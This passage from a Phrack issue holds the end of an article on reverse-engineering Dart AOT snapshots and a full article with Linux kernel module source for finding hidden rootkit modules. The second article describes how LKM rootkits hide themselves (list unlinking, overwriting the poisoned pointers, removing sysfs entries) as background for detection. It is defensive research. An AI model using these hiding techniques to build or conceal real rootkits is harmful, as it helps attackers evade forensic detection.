at least the first few arguments of a function are copied to dedicated
registers (the exact registers depend on the platform architecture). In
Dart assembly, notice how function arguments are copied on the stack:
mov qword [rsp], r11
call sym.printToConsole
The argument for the method printToConsole() is in r11. This argument is
copied to the address pointed at by rsp, the register stack pointer. This
does not follow standard conventions [4]. We'll even allow ourselves to
digress slightly: On x86-64, rsp is the name of the register holding a
pointer to the stack. On Aarch64, there is normally no such register and
Dart creates one, X15, that it uses as a stack pointer.
-- 1.5 - Small integers are doubled
In the Dart assembly code, just after the call to printToConsole, we
notice startling instructions concerning an array:
call sym.printToConsole
mov rbx, qword [r14 + 0x68]
mov r10d, 6
call sym.stub__iso_stub_AllocateArrayStub
mov qword [var_8h], rax
mov r11d, 0x8c
mov qword [rax + 0x17], r11
mov r11d, 0x8e
mov qword [rax + 0x1f], r11
mov r11d, 0x90
mov qword [rax + 0x27], r11
Our Dart source code has a single array: the array of Phrack issues with
values 70, 71 and 72 (in hexadecimal: 0x46, 0x47 and 0x48):
List issues = [ 70, 71, 72 ];
Instead, the code appears to be loading values 0x8c, 0x8e and 0x90. Why?
This is the final mystery we'll solve in this article.
-- 2 - Dart assembly registers
In our previous experiments, we have encountered r14, r15, and we also
discussed X15 on Aarch64. The source code explains what these registers
are assigned to. For example, this is an excerpt of defined constants for
the x86-64 platform:
enum Register {
RAX = 0,
RCX = 1,
RDX = 2,
RBX = 3,
RSP = 4, // SP
RBP = 5, // FP
RSI = 6,
RDI = 7,
R8 = 8,
R9 = 9,
R10 = 10,
R11 = 11, // TMP
R12 = 12, // CODE_REG
R13 = 13,
R14 = 14, // THR
R15 = 15, // PP
...
}
...
// Caches object pool pointer in generated code.
const Register PP = R15;
...
const Register THR = R14; // Caches current thread in generated code.
The comments are particularly helpful. We learn Dart features a dedicated
register pointing to the object pool (PP), and another register pointing
to the current thread. In Aarch64 the comments explicitly assign x15 as
the Stack Pointer (SP), "SP in Dart code". The other registers, like the
Frame Pointer (FP), Link Register (LR) and Program Counter (PC), use the
default values for their architecture:
+ ------------ + ----- + ----- + ----- +
| | PP | THR | SP |
+ ------------ + ----- + ----- + ----- +
| x86-64 | r15 | r14 | rsp |
| Aarch32 | r5 | r10 | r13 |
| Aarch64 | x27 | x26 | x15 |
+ ------------ + ----- + ----- + ----- +
-- 3 - The THR register
We just said Dart dedicates a register to holding a pointer to the
current running thread. This is interesting in a reverse engineering
context because the offsets to various elements are known. For example,
we know that the stack limit is at THR + 0x38 (see: Dart SDK source code;
in runtime/vm/compiler/runtime_offsets_extracted.h, search for
Thread_stack_limit_offset).
This helps us solve the mystery we mentioned in 1.2. On x86-64, the THR
register is held by r14. So, the last assembly line compares the stack
pointer with the stack limit:
push rbp ; save base pointer on the stack
mov rbp, rsp ; update base pointer
sub rsp, 0x30 ; allocate space on the stack
cmp rsp, qword [r14 + 0x38] ; compare with stack limit
In other words, the last instruction ensures that the operation we
performed on the stack do not go beyond its limit, i.e. that there is no
stack overflow.
Similarly, we find that THR + 0x68 is a null object. So, the instructions
below actually pass a null object as argument to the constructor of the
Random class:
mov r11, qword [r14 + 0x68] ; store null object in r11
mov qword [rsp], r11 ; push r11 on the stack
call sym.new_Random ; call constructor for Random()
-- 4 - The Dart Object Pool
The Object Pool is a table which stores and references frequently used
objects, immediates and constants within a Dart program.
For example, this is an excerpt of an Object Pool. See how it contains
objects (InternetAddressType), strings ("Unexpected address type"),
lists, etc:
[pp+0x170] Obj!InternetAddressType@3a7c81 : {
off_8: int(0x2)
}
[pp+0x178] String: "Unexpected address type "
[pp+0x180] String: "%"
[pp+0x188] List(5) [0, 0x2, 0x2, 0x2, Null]
[pp+0x190] List(5) [0, 0x3, 0x3, 0x3, Null]
In the assembly code, objects from the Object Pool are no longer accessed
directly, but by an offset to the beginning of the pool. This value is
held by the dedicated PP register.
Let's go back to our string mystery (1.3), when we wondered where the
input string "Welcome to Caesar encryption" was. Such a string is held
in the Object Pool. In x86-64, the register to access the pool is r15.
We spot it just before the call to the encrypt() method. The instruction
loads an object from the object pool at offset 0x168f, and passes it on
the stack as an argument to printToConsole().
mov r11, qword [r15 + 0x168f]
mov qword [rsp], r11
call sym.printToConsole
As this is our first print, and we know it prints "Welcome to Caesar
encryption", we deduce the string is referenced in the Object Pool at
this offset. The reason for this is simple. If the reverse engineering
were more complex, we'd have nothing to guide us. The real issue is that
disassemblers do not read the Object Pool and let us know what is at a
given offset.
-- 5 - Snapshot serialization
Why aren't disassemblers reading the Object Pool? What's difficult about
that? To answer this question, we need to explain the AOT snapshot format.
A Dart AOT snapshot consists of :
- A Header. It holds a magic value (0xdcdcf5f5), the snapshot size, kind
and hash. The snapshot hash identifies the Dart SDK version.
- A Cluster Information structure. A cluster is a set of objects with
the same Dart type. For example, the structure contains the number
of clusters.
- Several serialized clusters. This as a raw dump of each cluster:
+----------------------------- +
+ Dart AOT Header +
+ ---------------------------- +
+ Cluster Information +
+ ---------------------------- +
+ Serialized Cluster 1 +
+ ---------------------------- +
+ Serialized Cluster 2 +
+ ---------------------------- +
+ Serialized Cluster 3 +
+ ---------------------------- +
+ ... +
+ ---------------------------- +
For reverse engineering, we wish to parse the AOT snapshot format.
Reading the header is easy. This is the snapshot header of our Phrack
AOT snapshot, parsed with a Flutter header parser[5]:
-----------
Snapshot
offset = 35904 (0x8c40)
size = 92106
kind = SnapshotKindEnum.kFullAOT
dart sdk version = 3.3.0
features= product no-code_comments no-dwarf_stack_traces_mode
no-lazy_dispatchers dedup_instructions no-tsan no-asserts x64 linux
no-compressed-pointers null-safety
-----------
Reading the Cluster Information is slightly more difficult because it
uses a custom LEB128 format, but once we're aware of that, it poses no
more difficulty.
The complexity lies with reading serialized clusters. While we are mostly
interested in the serialized Object Pool (yes, the Object Pool is a Dart
type, therefore it is serialized in its own cluster), the Dart SDK has
over 150 clusters. Unfortunately, there is no way to reach a given cluster
(e.g. the Object Pool), we must de-serialize each cluster one by one until
we reach the one we are interested in. Said differently, there is no
random access in the snapshot, only sequential access. So, to de-serialize
the Object Pool, we must actually implement de-serialization of all
clusters, because we have no idea which cluster will be dumped before the
Object Pool.
This is lots of work, and an additional issue is that the Dart AOT format
is not officially documented and continues to evolve with new Dart SDK
versions. New versions change flags (for example, the header flag which
uses to indicate a "generic snapshot" is now used to identify an AOT
snapshot), but also many clusters have appeared. This is why tools such
as Darter [6] and Doldrum [7] unfortunately no longer work. In theory,
those tools could be ported to the current Dart SDK version, but it would
require extensive work, and we do not know how long that work would remain
operational.
To circumvent this issue, Blutter [8] uses another strategy. It implements
a Dart AOT snapshot dumper, compiled with the appropriate Dart SDK, and
uses it to parse the input snapshot. The tool reads the Object Pool and
dumps annotated assembly code. It is currently, however, limited to
Flutter applications for Android on Aarch64.
-- 6 - Representation of integers
Dart actually supports 2 types of integers: small integers (SMI) and big
integers, which are actually called "Mint" for Medium Integer. Small
integers fit in 31 bits. If they don't fit, they use the Mint type. The
least significant bit is reserved as an indicator: 0 for SMI, and 1 for
Mint:
+ -------------------------------- + - +
| 31 30 39 ..................... 1 | 0 |
+ -------------------------------- + - +
| Value | I |
+ -------------------------------- + - +
The immediate consequence to this design choice is that all small integers
appear to have their value multiplied by 2.
If we go back to the assembly of 1.5, the instructions appear to be
loading values 0x8c, 0x8e and 0x90:
mov r10d, 6
call sym.stub__iso_stub_AllocateArrayStub
mov qword [var_8h], rax
mov r11d, 0x8c
mov qword [rax + 0x17], r11
mov r11d, 0x8e
mov qword [rax + 0x1f], r11
mov r11d, 0x90
mov qword [rax + 0x27], r11
However, if we look more closely according to Dart's representation, the
least significant bit of each of those values is 0. Thus, they are SMIs,
and their value fits on bits 1-31. The represented values are consequently
0x8c / 2 = 70, 71 and 72 - which are the 3 integers we put in our integer
array.
The same applies to the first instruction: the apparent value of 6 is
provided as argument to the array stub function. This is a SMI, so we
are initializing an array of 3 cells (6 divided by 2).
For reverse engineering, knowing about this integer representation is
particularly useful when strings are represented as lists of ASCII code
values. When the ASCII code for character A is 0x41, the assembly will
actually need to load a hexadecimal literal of 0x82.
In Radare, the representation of Small Integers can be handled by a simple
r2pipe script [9]. For example, in the assembly below, the comments for
the 3 small integers were generated by the script:
mov r11d, 0x8c ; Load 0x46 (decimal=70, character="F")
mov qword [rax + 0x17], r11
mov r11d, 0x8e ; Load 0x47 (decimal=71, character="G")
mov qword [rax + 0x1f], r11
mov r11d, 0x90 ; Load 0x48 (decimal=72, character="H")
mov qword [rax + 0x27], r11
-- 7 - Function names
-- 7.1 - Stripped or non-stripped binaries
When Dart AOT snapshots are not stripped, disassemblers easily find
function names. For example, these are all methods of the Caesar class:
[0x0009ec7c]> afl~Caesar
0x00096c9c 3 80 sym.Caesar.decrypt
0x00096d28 10 245 sym.Caesar.encrypt
0x00096e20 1 11 sym.new_Caesar
But, naturally, AOT snapshots can be stripped (-S option at compilation
time), and disassemblers are unable to recover function names and generate
dummy names instead:
0x00050d34 20 490 fcn.00050d34
0x0005a0d8 3 121 fcn.0005a0d8
0x0005c440 6 129 fcn.0005c440
0x0007d210 1 30 fcn.0007d210
0x000768d0 1 90 fcn.000768d0
It is then particularly difficult to spot the main() or methods of the
Caesar class. They (probably) won't be at the same address, and there is
no easy way to locate them, as the assembly code contains no noticeable
string, no access to the Object Pool and no function name.
-- 7.2 - Trick for simple programs
In simple programs, we can search for particular instructions. For
example, our main() initializes an array of integers. Assigning the
first value is done with the instruction "mov r11d, 0x8c". We can search
for this instruction.
Note this technique is unlikely to yield good results in a real reverse
engineering situation, because (1) we don't know what to look for, (2) we
don't have access to the non stripped version, and (3) searching for an
instruction will return too many hits.
In the case of our simple Caesar program, the trick works and we are
extremely lucky to have a single hit:
[0x0007451f]> /ad mov r11d, 0x8c
0x000744b5 41bb8c000000 mov r11d, 0x8c
With several hits, we would have had to inspect the assembly lines around
the hit and check if it matches what the main() is expected to do.
We recognize the main as function fcn.00074480 (in Radare, command "afi"
tells you which function you are in, and "pi 15" disassemble 15
instructions):
[0x00034000]> s 0x000744b5
[0x000744b5]> afi~name
name: fcn.00074480
[0x000744b5]> s fcn.00074480
[0x00074480]> pi 15
push rbp
mov rbp, rsp
sub rsp, 0x28
cmp rsp, qword [r14 + 0x38]
jbe 0x745cd
mov r11, qword [r15 + 0x166f]
mov qword [rsp], r11
call fcn.00074ac4
mov rbx, qword [r14 + 0x68]
mov r10d, 6
call fcn.0007e968
mov qword [var_8h], rax
mov r11d, 0x8c
mov qword [rax + 0x17], r11
mov r11d, 0x8e
-- 7.3 - Retrieving function names in more complex situations
There are currently 3 workarounds:
1. JEB Pro Disassembler [10]. It is able to read the Object Pool and
retrieve function names in most situations. However, the tool is not
free and a license must be purchased.
2. reFlutter [11]. This open source tool patches the Flutter library to
dump function name offsets when it runs into them. The drawback with
this tool is that (1) it only works with Flutter applications, not
plain Dart snapshots, (2) the application needs to be recompiled with
the patched library, and (3) it is a dynamic analysis approach,
meaning reFlutter actually runs the application and only dumps parts
it gets into.
3. Blutter [8] is an other open source tool we have already mentioned.
It dumps assembly code with function names and their corresponding
offset. The tool currently only supports Android Flutter applications
generated for Aarch64.
For example, I have created a basic application with a basic widget
implementing the Caesar algorithm. The application has a class MyApp,
with a constructor and 2 methods: build(), which creates the widget, and
work() which performs Caesar encryption/decryption. I compiled the
application for Android Aarch64 and used Blutter on it:
// class id: 1442, size: 0xc, field offset: 0xc
// const constructor,
class MyApp extends StatelessWidget {
_ build(/* No info */) {
// ** addr: 0x221aec, size: 0x120
// 0x221aec: EnterFrame
// 0x221aec: stp fp, lr, [SP, #-0x10]!
// 0x221af0: mov fp, SP
// 0x221af4: AllocStack(0x28)
// 0x221af4: sub SP, SP, #0x28
// 0x221af8: CheckStackOverflow
// 0x221af8: ldr x16, [THR, #0x38] ; THR::stack_limit
...
_ work(/* No info */) {
// ** addr: 0x221c24, size: 0x288
// 0x221c24: EnterFrame
...
The dumped assembly shows:
- The address of build(): 0x221aec
- The address of xor_stage3(): 0x221c24
- And the instructions for both methods.
The instructions are annotated with the function name or the pool object
when the case applies, making the assembly easier to understand. For
example, see how Blutter shows the string "Welcome to Caesar encryption":
// 0x221c78: r16 = "Welcome to Caesar encryption"
// 0x221c78: ldr x16, [PP, #0x6e40] ; [pp+0x6e40] "Welcome to Caesar encryption"
// 0x221c7c: str x16, [SP]
// 0x221c80: r0 = printToConsole()
// 0x221c80: bl #0x159df4 ; [dart:_internal] ::printToConsole
Finally, remember that earlier we noticed the x86-64 assembly was passing
a null object, via THR + 0x68, as an argument to the constructor of the
Random class. In Blutter, we see the assembly for Aarch64 is different.
It doesn't use the THR register for that and explicitly passes NULL:
// 0x221cac: str NULL, [SP]
// 0x221cb0: r0 = Random()
// 0x221cb0: bl #0x206268 ; [dart:math] Random::Random
Overall, the different annotations of Blutter make assembly easier to
read, and it would be helpful to have them for other platforms and
integrate the same features in disassemblers.
-- 8 - Conclusion and perspectives
With this article, you should be able to understand the format of Dart
AOT snapshots, and grasp the complexity of parsing the Object Pool or
de-serialize any cluster.
We have explained the use of the dedicated THR and PP registers. You are
able to understand the assembly of function prologues, how strings or any
other object of the object pool is loaded, and how lists of integers are
represented.
We have also provided tricks and tools to parse the Object Pool and
recover function names, even in the case of stripped snapshots.
Major disassemblers are likely to add support for Dart in the next few
months or years. However, this is really only viable if the Dart SDK
becomes stable enough for such work to be worth it. Meanwhile, we seem
better off integrating strategies, such as Blutter, which recompile tools
from the Dart SDK.
-- References
[1] https://dart.dev/tools/dart-compile#types-of-output
[2] https://flutter.dev
[3] https://www.radare.org/
[4] https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions
[5] https://github.com/cryptax/misc-code/blob/master/flutter/flutter-header.py
[6] https://github.com/mildsunrise/darter
[7] https://github.com/rscloura/Doldrums
[8] https://github.com/worawit/blutter
[9] https://github.com/cryptax/misc-code/blob/master/flutter/dart-bytes.py
[10] https://pnfsoftware.com
[11] https://github.com/Impact-I/reFlutter
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0C of 0x11
|=-----------------------------------------------------------------------=|
|=-[ Finding hidden kernel modules (extrem way reborn): 20 years later ]-=|
|=-----------------------------------------------------------------------=|
|=------------------[ g1inko ]-------------------=|
|=-----------------------------------------------------------------------=|
0 intro
1 Some words on LKM-rootkits
2 On existing tools
2.1 Some words on the original module_hunter
2.2 rkspotter and __module_address() problem
2.3 Other challenges in adopting _that_ extrem way
3 The rebirth
3.1 Detecting a stray struct module
3.2 On virtual memory of x86_64 architecture
3.3 Paging levels while solving the 'problem of unmapped'
4 Other architectures and outro
5 References
6 The code
0 intro
=======
Several years ago, while trying to get a grasp on Linux kernel rootkits,
I came across an old Phrack Linenoise article [1] that discussed an
interesting way of finding them. It totally caught my attention, even
though it was so mysterious and far beyond my knowledge and experience
back then.
It took me some time to fill in the gaps in my knowledge. Eventually I
realized I was ready to reimplement the idea of finding hidden kernel
modules in memory for modern kernels and x86_64 machines. Now, 20 years
after the original publication, I am somewhat proud to finally share the
rebirth of this technique, with all the honors to madsys for inspiration.
1 Some words on LKM-rootkits
============================
Since the first publication (known to me, at least) about Linux kernel
rootkits in Phrack in April 1997 [2], and right up to this day, malicious
loadable kernel modules (LKM-rootkits) all tend to use the same self-
hiding technique, namely unlinking themselves from the in-kernel linked
list of loaded modules. This prevents the module from showing up in procfs
and lsmod, and rmmod is unable to find and unload such modules.
Some rootkits also try to mess with the memory afterwards, to make
forensics even harder. For example, since version 2.5.71, Linux poisons
stale list pointers of the unlinked struct by setting them to LIST_POISON1
and LIST_POISON2 (0x00100100 and 0x00200200). This is used to help detect
memory bugs.
Some anti-rootkits use this to detect unlinked LKM descriptors, thus
detecting a kernel rootkit. However, a rootkit can overwrite these values
after unlinking and evade this check. For instance, the KoviD LKM that
appeared in 2022 [3] does this.
Also, despite the fact that LKM rootkits do unlink themselves from the
modules list, they still can be listed via sysfs in /sys/modules. This is
even mentioned in the Volatility documentation [4] and is an established
method for detecting such rootkits. Although Volatility developers claim
to never have faced a rootkit that would also remove itself from sysfs,
KoviD rootkit does it as well.
For that, KoviD uses sysfs_remove_file() helper, and sets its state to
MODULE_STATE_UNFORMED. This state is for cases when a module is still
setting up, and the kernel module loader is still running. This trick
helps to evade anti-rootkits that rely on the kernel __module_address()
function when enumerating virtual memory, such as rkspotter [5].
2 On existing tools
===================
2.1 Notes on the original module_hunter
---------------------------------------
The original implementation was created during the time of Linux 2.2-2.4
for i386 machines. Now it is Linux ~6.8 and lots of x86_64 systems around.
So many things have changed or removed, and new features were introduced.
The kernel is known to have highly unstable internal API, no surprise that
the 20-years-old module_hunter.c wouldn't build anymore. By understanding
how it works, it turns out to be possible to reimplement the technique for
a modern kernel.
In short, the logic for finding a malicious LKM was to go through the
memory region that contained module structs, and dump the info if it
contained anything that looked like a sane struct module. At the time,
this struct had way less fields than it does today, as it has been heavily
reworked and extended over the years.
For example, there is no more 'size' field, but many others were added.
It is interesting that module's name at that time was stored using a
pointer, while nowadays it is a static array of chars right within the
struct module.
2.2 rkspotter and __module_address() problem
--------------------------------------------
While looking for a way to look for safe memory addresses via brute force,
I found the aforementioned anti-rootkit named rkspotter. It detects several
hiding techniques which allows it to find rootkits even if one the methods
fail, but it relies on the __module_address() function in the kernel.
This function was unexported in 2020 during a series of kernel patches [6],
and became unavailable out-of-kernel since Linux 5.4.118. This means that
we must avoid using it as well.
The core idea of rkspotter is to go through the so-called module mapping
space, and check which address belongs to which module using
__module_address(). According to the doc, it lets one 'get the module which
contains an address'.
For a given address, __module_address() returns a struct module pointer of
a corresponding LKM. This function was a convenient way to get module info,
all the work for dereferencing page tables and checking for physical page
presence was done internally.
Well yes, I know that I could try to copycat this __module_address() in the
module's code, but what I wanted to copycat was module_hunter by madsys, so
forget it :D
2.3 Other challenges in adopting _that_ extrem way
--------------------------------------------------
Based on what has been changed over the years, we will need to solve a few
problems to implement a newer tool (or rather a PoC?) for finding stray LKM
descriptors. Problems like:
- Fix broken kernel API. As the code of module_hunter is actually very
small, and the only API used was for procfs, it didn't take long to
find a way to export a proc file to communicate with the kernel module.
- Choose new fields of struct module that are the most appropriate for
detecting a stray struct.
- Memory management on x86_64 differs from that of i386, so the code that
checks for the page's presence needs to be fully reimplemented, more on
that below.
- Kernel virtual memory layout on x86_64 is also totally different from
that of i386. For instance, the kernel part of virtual memory space on
x86_64 is very huge compared to vmalloc area of its 32-bit predecessor,
where struct modules were allocated back then (that is, 128 TB vs.
128 MB).
Since the modules region is way larger on x86_64, more checks are
needed to eliminate false positives on garbage remnants in memory.
With enough time and persistence, we at least get repaid with new cool
knowledge, so let's go!
3 The rebirth
=============
3.1 Detecting a stray struct module
-----------------------------------
After playing with existing struct module fields I decided to introduce
more checks on memory contents, beyond just checking for the validity of
a module's name. That alone showed to be insufficient for x86_64 modules
memory area--more on this in 3.2), such as:
- The state field has one of the sane values: MODULE_STATE_LIVE,
MODULE_STATE_COMING, MODULE_STATE_GOING, MODULE_STATE_UNFORMED;
- The init and exit fields either point into the module mapping space of
x86_64 or are NULL;
- At least one of init, exit, next and prev fields is not NULL and point
to either module mapping area or are canonical (e.g. list pointers);
- core_layout.size is not 0, but equals to 0 modulo PAGE_SIZE.
This list may vary in future, especially if i catch some more sophisticated
LKM. The check may become more flexible, but it works as PoC quite well.
3.2 On virtual memory of x86_64 architecture
--------------------------------------------
Now that we've determined fields of interest, we need to know where to
start and finish testing for struct module similarity. Otherwise it would
be quite tough to bruteforce the whole almost-64-bit virtual address space.
In the virtual memory layout of modern x86_64 Linux, there is a dedicated
module mapping space [7], with size of 1520 MB, for both 48- and 57-bit
virtual addresses. The start address is designated with a macro
MODULES_VADDR and the end address is represented by a MODULES_END macro.
After some more playing, I found out that module mapping space is where
both module binaries, and their descriptors get allocated. This is just
fine, as going through many terabytes of the vast virtual address space
was my biggest concern in terms of execution time.
3.3 Paging levels while solving the 'problem of unmapped'
---------------------------------------------------------
NOTE: If you're not quite familiar with paging mechanism, refer to e.g. the
OSDev wiki [8] or Linux documentation [9] (or processor's).
Well, now we are a facing the same problem as the one noted in the original
paper:
``By far, maybe you think: umm, it's very easy to use brute force to list
those evil modules". But it is not true because of an important
reason: it is possible that the address which you are accessing is
unmapped, thus it can cause a paging fault and the kernel would report:
"Unable to handle kernel paging request at virtual address". ''
This would be resolved automatically when using __module_address(), but we
cannot afford it, so we need to check for page presence ourselves. To do
that, we need to go through tables that contain info about relations of
virtual and physical pages for a process. The kernel space part is the
same for each process because it maps to the same physical pages.
For supporting more physical memory, more page table levels were added in
64-bit x86, and now it can be 4 or 5 of them depending on both hardware
and kernel support. For each paging level, the PDE/PTE being dereferenced
must be checked for presence in RAM by using one of the following macros:
- pgd_present();
- p4d_present() (if 5-level paging is used or emulated);
- pud_present();
- pmd_present();
- pte_present().
Without getting too deep into the MMU guts, the check for the top level,
using currently available kernel macros and functions would look like this:
----snip----
struct mm_struct *mm = current->mm;
----snip----
pgd = pgd_offset(mm, addr);
if (!pgd || pgd_none(*pgd) || !pgd_present(*pgd) )
return false;
----snip----
You may find this check a bit paranoid and, especially looking at similar
in-kernel functions, maybe it's okay to remove pgd_none(). When I'm writing
kernel C for a subsystem I am not quite familiar with, I feel much better
safe than sorry :D
There was a function called kern_addr_valid() performing similar checks,
but it was removed from the kernel a year ago [10]. dump_pagetable(),
spurious_kernel_fault(), mm_find_pmd() and some others also do that.
As for the varying number of paging levels, we could find out the proper
number with ether CONFIG_PGTABLE_LEVELS or CONFIG_X86_5LEVEL. The first
one seems better if I (or anyone else) decide to port it to some other
architecture.
Support for 5-level paging was introduced in 2017 with versions 4.11-4.12
[11, 12]. Interestingly, with CONFIG_PGTABLE_LEVELS=5 the kernel wouldn't
break on 4-level hardware [13]:
``In this case additional page table level - p4d - will be folded at
runtime.''
4 Other architectures and outro
===============================
The only thing that prevents us from getting the code to work on
architectures other than x86_64 is (obviously) architecture-dependent
stuff. Virtual address spaces of other architectures (i.e. AArch64)
is different, not only in its layout and size, but also in the possible
number of paging levels. This may vary from 2 to 4, depending on the page
size and virtual addresses bits [14].
Notably, the code did compile for AArch64 running the 6.1.21 kernel,
until I added a check for CONFIG_X86_64. Due to memory management
differences, it of course did not report anything found.
As for kernel versions compatibility, I've tested the code on 4.4, 5.14,
5.15 and 6.5 x86_64 kernels. It still may fail on some intermediate or
newer versions, most likely somewhere in the page table dereferencing
code. Feel free to let me know if that happens.
Once all the hardware incompatibility issues are properly taken into
account, I believe it's possible to run the tool on other architectures
as well. Hopefully I can add support for at least AArch64 once I'm ready
to dive into its memory management. PRs and suggestions (see [15]) are
also welcome! :^)
5 References
============
1. http://phrack.org/issues/61/3.html#article
2. http://phrack.org/archives/issues/50/5.txt
3. https://github.com/carloslack/KoviD
4. https://github.com/volatilityfoundation/volatility/wiki/Linux-Command-
Reference#linux_check_modules
5. https://github.com/linuxthor/rkspotter
6. https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.4.118
7. https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt
8. https://wiki.osdev.org/Paging
9. https://www.kernel.org/doc/html/v6.5/mm/page_tables.html
10. https://lore.kernel.org/lkml/Y05fQrd4TYaOnks%2F@infradead.org/
11. https://github.com/torvalds/linux/commit/b8504058a06bd19286c8b59539eebfda69d1ecb5
12. https://lwn.net/Articles/716324/
13. https://www.kernel.org/doc/html/v5.9/x86/x86_64/5level-paging.html#enabling-5-level-paging
14. https://www.kernel.org/doc/html/v6.5/arch/arm64/memory.html
15. https://github.com/ksen-lin/nitara2
6 The code (cleared a bit for the paper)
========================================
-----BEGIN NITARA2.C-----
/*
* original idea: madsys, "Finding hidden kernel modules (the extrem way)"
* http://phrack.org/issues/61/3.html
*
* usage: cat /proc/nitara2 && dmesg
*/
#include
#include
#include
#include
#include
#include
#include
#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 5, 0)
# include
#elif LINUX_VERSION_CODE >= KERNEL_VERSION(5, 8, 0)
# include
#elif LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
# include
#else /* < 4.11 */
# include
#endif
#include
#include
#include
#include
#include
#ifndef CONFIG_X86_64
# error "arch not supported :("
#endif
#define NITARA_PRINTK(fmt, args...) \
printk("%s: " fmt, module_name(THIS_MODULE), ##args)
#define NITARA_MODSIZE (0x1000 * PAGE_SIZE)
#ifndef sizeof_field
#define sizeof_field(TYPE, MEMBER) sizeof((((TYPE *)0)->MEMBER))
#endif
/* NOTE: arch-specific, we don't handle it yet */
#ifndef __canonical_address
static __always_inline u64 __canonical_address(u64 vaddr, u8 vaddr_bits)
{
return ((s64)vaddr << (64 - vaddr_bits)) >> (64 - vaddr_bits);
}
#endif
#ifndef __is_canonical_address
static __always_inline u64 __is_canonical_address(u64 vaddr, u8 vaddr_bits)
{
return __canonical_address(vaddr, vaddr_bits) == vaddr;
}
#endif
#define is_canonical_48(p) __is_canonical_address((unsigned long)p, 48)
#define is_canonical_or_zero(p) (p == NULL || is_canonical_48(p))
#define is_canonical_high_or_zero(p) \
(p == NULL || ((unsigned long)p >= VMALLOC_START && is_canonical_48(p)))
#if LINUX_VERSION_CODE >= KERNEL_VERSION(6, 4, 0)
#define MODSIZE(p) \
(p->mem[MOD_TEXT].size \
+ p->mem[MOD_INIT_TEXT].size \
+ p->mem[MOD_INIT_DATA].size \
+ p->mem[MOD_INIT_RODATA].size \
+ p->mem[MOD_RO_AFTER_INIT].size \
+ p->mem[MOD_RODATA].size \
+ p->mem[MOD_DATA].size)
#else
# define MODSIZE(p) (p->core_layout.size)
#endif
/*
* https://stackoverflow.com/questions/11134813/
* https://stackoverflow.com/questions/66593710/
* https://lwn.net/Articles/716324/
*/
static bool valid_addr(unsigned long addr, size_t size)
{
pgd_t *pgd;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
p4d_t *p4d;
#endif
pmd_t *pmd;
pud_t *pud;
pte_t *pte;
struct mm_struct *mm = current->mm;
unsigned long end_addr;
pgd = pgd_offset(mm, addr);
if (unlikely(!pgd) || unlikely(pgd_none(*pgd)) || unlikely(!pgd_present(*pgd)) )
return false;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 11, 0)
p4d = p4d_offset(pgd, addr);
if (unlikely(!p4d) || unlikely(p4d_none(*p4d)) || unlikely(!p4d_present(*p4d)) )
return false;
pud = pud_offset(p4d, addr);
#else
pud = pud_offset(pgd, addr);
#endif
if (unlikely(!pud) || unlikely(pud_none(*pud)) || unlikely(!pud_present(*pud)))
return false;
pmd = pmd_offset(pud, addr);
if (unlikely(!pmd) || unlikely(pmd_none(*pmd)) || unlikely(!pmd_present(*pmd)))
return false;
if (pmd_trans_huge(*pmd)) {
end_addr = (((addr >> PMD_SHIFT) + 1) << PMD_SHIFT) - 1;
goto end;
}
// NOTE: pte_offset_map() is unusable out-of-tree on >=6.5.
// As pte_offset_kernel() seems to work, use it instead :D
pte = pte_offset_kernel(pmd, addr);
if (unlikely(!pte) || unlikely(!pte_present(*pte)))
return false;
end_addr = (((addr >> PAGE_SHIFT) + 1) << PAGE_SHIFT) - 1;
end:
if (end_addr >= addr + size - 1)
return true;
return valid_addr(end_addr + 1, size - (end_addr - addr + 1));
}
static bool is_within_modules(void *p)
{
return (unsigned long)p >= MODULES_VADDR && (unsigned long)p < MODULES_END;
}
__maybe_unused static bool is_within_modules_or_zero(void *p)
{
return p == NULL || is_within_modules(p);
}
static bool check_name_valid(char *s)
{
size_t i;
if (!s)
return false;
for (i = 0; i < sizeof_field(struct module, name); i += 1) {
/* we might fail here if the name is "" */
if (s[i] == '\0' && i != 0)
break;
if (s[i] < 0x20 || s[i] > 0x7e)
return false;
}
return true;
}
ssize_t showmodule_read(
struct file *unused_file,
char *buffer, size_t len,
loff_t *off
) {
struct module *p;
unsigned long i;
NITARA_PRINTK("address module size\n");
for (
i = 0, p = (struct module *)MODULES_VADDR;
p <= (struct module*)(MODULES_END - 0x10);
p = ((struct module*)((unsigned long)p + 0x10)), i += 1
) {
if (
valid_addr((unsigned long)p, sizeof(struct module))
&& p->state >= MODULE_STATE_LIVE
&& p->state <= MODULE_STATE_UNFORMED
&& check_name_valid(p->name)
// may be unset for modules that can also be compiled in-kernel
&& is_within_modules_or_zero(p->init)
&& is_within_modules_or_zero(p->exit)
&& (p->init || p->exit || p->list.next || p->list.prev)
// https://elixir.bootlin.com/linux/v5.19/source/include/linux/list.h#L146
&& (is_canonical_high_or_zero(p->list.next) || p->list.next == LIST_POISON1)
&& (is_canonical_high_or_zero(p->list.prev) || p->list.prev == LIST_POISON2)
&& MODSIZE(p) && (MODSIZE(p) % PAGE_SIZE == 0)
) {
NITARA_PRINTK("0x%lx: %20s %u\n", (unsigned long)p, p->name, MODSIZE(p));
}
}
NITARA_PRINTK("end check (total gone %lu steps)\n", i);
return 0;
}
#if LINUX_VERSION_CODE > KERNEL_VERSION(5, 5, 19)
static struct proc_ops nitara2_ops = {
.proc_read = showmodule_read,
.proc_lseek = default_llseek, // otherwise segfaults
};
#else
// include/linux/fs.h#L1692
static struct file_operations nitara2_ops = {
.read = showmodule_read,
.llseek = default_llseek,
};
#endif
struct proc_dir_entry *entry;
int init_module()
{
NITARA_PRINTK("[creating proc entry]\n");
entry = proc_create_data("nitara2", S_IRUSR, NULL, &nitara2_ops, NULL);
return 0;
}
void cleanup_module()
{
NITARA_PRINTK("[cleanup proc]\n");
proc_remove(entry);
}
MODULE_LICENSE("GPL");
MODULE_AUTHOR("ksen-lin hotmail[.]com>");
-----END NITARA2.C-----
|=[ EOF ]=---------------------------------------------------------------=|
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0D of 0x11
|=-----------------------------------------------------------------------=|
